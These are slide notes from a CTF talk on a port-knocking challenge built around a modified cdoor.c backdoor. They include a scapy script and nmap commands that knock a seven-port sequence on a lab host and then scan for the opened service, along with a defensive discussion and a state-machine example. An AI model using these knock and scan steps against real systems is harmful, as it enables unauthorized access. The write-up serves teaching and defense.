Александр Зайцев - port knocking, short notes
[Slide 1]
Port knocking challenge
PHD CTF Afterparty 2011
the short notes
Sheridan: Knock, knock.
Ivanova: Who's there?
Sheridan: Kosh.
Ivanova: Kosh who?
Sheridan: Gesundheit. [snickers]
I thought that was a good one.
Babylon 5
[Slide 2]
Step by step into the trap
(diagram: Step 1, Step 2, Step 3, Step 4; copyright http://www.portknocking.org/)
[Slide 3]
Task overview
1 box running FreeBSD
1 anonymous FTP server
1 file: traffic.zip -> traffic.pcap
Slightly modified cdoor.c by FX of Phenoelit
[Slide 4]
Traffic.pcap #1
[Slide 5]
Traffic.pcap #2
[Slide 6]
Initial state
[Slide 7]
“Knocked” state
[Slide 8]
EINDBAZEN solution
```python
#!/usr/bin/python
# sheldon.py
# EINDBAZEN solution to port knocking challenge PHD CTF Quals 2011
import subprocess
# Import scapy
from scapy.all import *
conf.verb = 0
# Ports, in the order they must be knocked
ports = [951, 4826, 9402, 235, 16821, 443, 100]
# Knock twice on every port
for dport in range(0, len(ports)):
    print("[*] Knocking on 192.168.0.5: ", ports[dport])
    ip = IP(dst="192.168.0.5")
    port = 39367
    SYN = ip/TCP(sport=port, dport=ports[dport], flags="S", window=2048, options=[('MSS', 1460)], seq=0)
    send(SYN); print("*KNOCK*")
    port = 39368
    SYN = ip/TCP(sport=port, dport=ports[dport], flags="S", window=2048, options=[('MSS', 1460)], seq=0)
    send(SYN); print("*KNOCK*")
    print("PENNY")
# Use NMAP for scanning for open ports
# We also use -sV, so nmap connects to the port and gets the flag
print("[*] Scanning for open ports using nmap")
subprocess.call("nmap -sS -sV -T4 -p 1024-2048 192.168.0.5", shell=True)
```
[Slide 9]
Simple solution
```shell
nmap -n -sS -T2 -r -p951 192.168.0.5
nmap -n -sS -T2 -r -p4826 192.168.0.5
nmap -n -sS -T2 -r -p9402 192.168.0.5
nmap -n -sS -T2 -r -p235 192.168.0.5
nmap -n -sS -T2 -r -p16821 192.168.0.5
nmap -n -sS -T2 -r -p443 192.168.0.5
nmap -n -sS -T2 -r -p100 192.168.0.5
nmap -n -sS -T4 -p1024-2048 -sV 192.168.0.5
```
[Slide 10]
Why not?
The best way to send the required SYN packets to the system is the use of nmap:
./nmap -sS -T Polite -p<port1>,<port2>,<port3> <target>
NOTE: the Polite timing ensures that nmap sends the packets serial as defined.
FX - cdoor.c
Why not “nmap -n -sS -T2 -r -p951,4826,9402,235,16821,443,100 192.168.0.5”?
Because:
Nowadays “-T Polite” (-T2) no longer ensures that the SYN packets are transmitted sequentially in the given order
[Slide 11]
Advantages
A sequence of 3 simple TCP knocks requires 281,474,976,710,656 (65,536³) packets to brute-force (worst case)
Usually only the IP that provided the correct sequence is whitelisted
Simple implementation – fewer vulnerabilities
Prevents login brute-forcing and mass vulnerability exploitation
In some cases may aid in DoS mitigation
Modern implementations allow cryptographic hashes inside the knocking sequence (Single Packet Authentication)
[Slide 12]
Disadvantages
If the knocking daemon dies, the “system dies”
  solved by a process monitor daemon
Legitimate clients can be locked out with IP spoofing
  solved by adding crypto-hashes
Dropped packets result in an incorrect knock
  solved by retransmission
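As an added example (not the slides' code and not cdoor.c, whose exact rules are not reproduced here), this is the per-source state machine a knocking daemon keeps, replayed over constructed SYN events: it shows why the order matters (the “Why not?” slide), why one dropped knock fails the sequence until the client retransmits, and that only the source that completed the sequence is whitelisted. The reset and duplicate policy and the sample source IPs are assumptions for the demo.

```python
from typing import Dict, Iterable, List, Set, Tuple

# The seven knock ports from the challenge, in the order they must arrive.
KNOCK_SEQUENCE: List[int] = [951, 4826, 9402, 235, 16821, 443, 100]


class KnockTracker:
    """Per-source progress through the knock sequence (assumed policy, not cdoor.c's)."""

    def __init__(self, sequence: List[int]) -> None:
        self.sequence = sequence
        self.knock_ports: Set[int] = set(sequence)
        self.progress: Dict[str, int] = {}     # src_ip -> index of the next expected port
        self.whitelisted: Set[str] = set()

    def on_syn(self, src_ip: str, dport: int) -> bool:
        """Feed one SYN; return True if it completed the sequence for src_ip."""
        if dport not in self.knock_ports:
            return False                       # unrelated traffic (e.g. to the FTP server) is ignored
        idx = self.progress.get(src_ip, 0)
        if dport == self.sequence[idx]:
            idx += 1                           # the expected knock: advance
        elif idx > 0 and dport == self.sequence[idx - 1]:
            pass                               # duplicate of the last accepted knock (retransmit): tolerate
        else:
            idx = 1 if dport == self.sequence[0] else 0   # wrong order: start over
        if idx == len(self.sequence):
            self.whitelisted.add(src_ip)       # only the source that knocked correctly is let in
            self.progress[src_ip] = 0
            return True
        self.progress[src_ip] = idx
        return False


def replay(events: Iterable[Tuple[str, int]]) -> Set[str]:
    """Replay (src_ip, dport) SYN events, as one would extract them from a pcap."""
    tracker = KnockTracker(KNOCK_SEQUENCE)
    for src, dport in events:
        tracker.on_syn(src, dport)
    return tracker.whitelisted


# Constructed SYN events (not taken from traffic.pcap); the source IPs are made up.
DOUBLE_KNOCK = [("10.0.0.5", p) for p in KNOCK_SEQUENCE for _ in range(2)]       # twice per port, as sheldon.py does
DROPPED_KNOCK = [("10.0.0.6", p) for p in KNOCK_SEQUENCE if p != 9402]           # one knock lost on the wire
SHUFFLED_KNOCK = [("10.0.0.7", p) for p in (951, 9402, 4826, 235, 16821, 443, 100)]  # right ports, wrong order

if __name__ == "__main__":
    print(replay(DOUBLE_KNOCK + DROPPED_KNOCK + SHUFFLED_KNOCK))   # {'10.0.0.5'}
```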
[Slide 13]
Defense in depth
after all, it’s just another layer
[Slide 14]
The more you know
http://www.phenoelit-us.org/stuff/cd00rdescr.html
- original cdoor.c
http://eindbazen.net/?p=316
- challenge write-up from EINDBAZEN team
http://en.wikipedia.org/wiki/Port_knocking
- basic info (used in this presentation)
http://www.portknocking.org
- one big port knocking/SPA resource
http://www.aldabaknocking.com/?q=portknocking
- another big port knocking/SPA resource